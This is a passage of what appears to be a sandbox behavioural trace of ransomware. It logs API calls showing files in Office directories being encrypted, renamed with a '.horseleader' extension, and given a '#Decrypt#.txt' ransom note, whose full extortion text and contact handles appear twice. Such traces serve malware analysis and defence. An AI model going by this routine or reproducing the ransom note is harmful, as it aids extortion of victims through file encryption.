Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\..") returned 95 [0244.812] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.812] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.812] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4e37e00, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="Proof.XML", cAlternateFileName="")) returned 1 [0244.812] lstrcmpiW (lpString1="Proof.XML", lpString2="Windows") returned -1 [0244.812] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 102 [0244.812] StrStrIW (lpFirst="Proof.XML", lpSrch=".horseleader") returned 0x0 [0244.812] lstrcmpW (lpString1="Proof.XML", lpString2="#Decrypt#.txt") returned 1 [0244.812] lstrcmpW (lpString1="Proof.XML", lpString2="_uninstalling_.png") returned 1 [0244.812] lstrlenW (lpString=".testttjffg") returned 11 [0244.812] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML", lpSrch=".testttjffg") returned 0x0 [0244.812] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.812] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.812] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" 
(normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.814] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 102 [0244.814] StrStrW (lpFirst="Proof.XML", lpSrch=".txt") returned 0x0 [0244.814] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1457) returned 1 [0244.814] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5b1, lpOverlapped=0x0) returned 1 [0244.816] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffa4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.816] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5b1, lpOverlapped=0x0) returned 1 [0244.816] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.816] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.816] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.817] CloseHandle (hObject=0x15c) returned 1 [0244.817] GetProcessHeap () returned 0x780000 [0244.817] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.817] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.horseleader") returned 114 [0244.817] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml.horseleader")) returned 1 [0244.818] GetProcessHeap () returned 0x780000 [0244.818] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.818] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4e37e00, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="Proof.XML", cAlternateFileName="")) returned 0 [0244.818] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.818] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\#Decrypt#.txt") returned 106 [0244.818] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\#Decrypt#.txt" 
(normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.818] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.818] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.820] lstrlenA (lpString="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") returned 1368 [0244.820] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.820] CloseHandle (hObject=0x1a4) returned 1 [0244.820] GetProcessHeap () returned 0x780000 [0244.820] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.820] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7941190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7941190, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0244.820] lstrcmpiW (lpString1="Proof.fr", lpString2="Windows") returned -1 [0244.820] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr") returned 92 [0244.820] lstrcmpW (lpString1="Proof.fr", lpString2=".") returned 1 [0244.820] lstrcmpW (lpString1="Proof.fr", lpString2="..") returned 1 [0244.820] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.820] GetProcessHeap () 
returned 0x780000 [0244.820] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.820] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\*") returned 94 [0244.820] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7941190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7941190, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.822] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.822] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\.") returned 94 [0244.822] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.822] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7941190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7941190, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="..", cAlternateFileName="")) returned 1 [0244.822] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.822] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\..") returned 95 [0244.822] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.822] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.822] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2bd90c0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="Proof.XML", cAlternateFileName="")) returned 1 [0244.822] lstrcmpiW (lpString1="Proof.XML", lpString2="Windows") returned -1 [0244.822] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 102 [0244.822] StrStrIW (lpFirst="Proof.XML", lpSrch=".horseleader") returned 0x0 [0244.822] lstrcmpW (lpString1="Proof.XML", lpString2="#Decrypt#.txt") returned 1 [0244.822] lstrcmpW (lpString1="Proof.XML", lpString2="_uninstalling_.png") returned 1 [0244.822] lstrlenW (lpString=".testttjffg") returned 11 [0244.822] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML", lpSrch=".testttjffg") returned 0x0 [0244.822] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.822] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.823] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" 
(normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.823] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 102 [0244.823] StrStrW (lpFirst="Proof.XML", lpSrch=".txt") returned 0x0 [0244.823] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1458) returned 1 [0244.823] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5b2, lpOverlapped=0x0) returned 1 [0244.826] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffa4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.826] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5b2, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5b2, lpOverlapped=0x0) returned 1 [0244.826] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.826] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.826] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.826] CloseHandle (hObject=0x15c) returned 1 [0244.826] GetProcessHeap () returned 0x780000 [0244.826] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.826] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.horseleader") returned 114 [0244.826] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml.horseleader")) returned 1 [0244.827] GetProcessHeap () returned 0x780000 [0244.827] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.827] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2bd90c0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="Proof.XML", cAlternateFileName="")) returned 0 [0244.828] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.828] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\#Decrypt#.txt") returned 106 [0244.828] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\#Decrypt#.txt" 
(normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.829] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.829] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.830] lstrlenA (lpString="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") returned 1368 [0244.830] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.830] CloseHandle (hObject=0x1a4) returned 1 [0244.831] GetProcessHeap () returned 0x780000 [0244.831] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.831] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab640f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xab8a250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xab8a250, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Proofing.en-us", cAlternateFileName="PROOFI~1.EN-")) returned 1 [0244.831] lstrcmpiW (lpString1="Proofing.en-us", lpString2="Windows") returned -1 [0244.831] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us") returned 98 [0244.831] lstrcmpW (lpString1="Proofing.en-us", lpString2=".") returned 1 [0244.831] lstrcmpW (lpString1="Proofing.en-us", lpString2="..") returned 1 [0244.831] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") 
returned -1 [0244.831] GetProcessHeap () returned 0x780000 [0244.831] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.831] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\*") returned 100 [0244.831] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab640f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xab8a250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xab8a250, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.832] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.832] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\.") returned 100 [0244.832] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.832] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab640f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xab8a250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xab8a250, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="..", cAlternateFileName="")) returned 1 [0244.832] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.832] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\..") returned 101 [0244.832] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.832] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.832] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf00db300, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xab8a250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x32b, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="Proofing.XML", cAlternateFileName="")) returned 1 [0244.832] lstrcmpiW (lpString1="Proofing.XML", lpString2="Windows") returned -1 [0244.832] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 111 [0244.832] StrStrIW (lpFirst="Proofing.XML", lpSrch=".horseleader") returned 0x0 [0244.832] lstrcmpW (lpString1="Proofing.XML", lpString2="#Decrypt#.txt") returned 1 [0244.832] lstrcmpW (lpString1="Proofing.XML", lpString2="_uninstalling_.png") returned 1 [0244.832] lstrlenW (lpString=".testttjffg") returned 11 [0244.832] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML", lpSrch=".testttjffg") returned 0x0 [0244.832] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.832] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.833] CreateFileW (lpFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.833] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 111 [0244.833] StrStrW (lpFirst="Proofing.XML", lpSrch=".txt") returned 0x0 [0244.833] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=811) returned 1 [0244.833] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x32b, lpOverlapped=0x0) returned 1 [0244.835] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffcd5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.835] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, 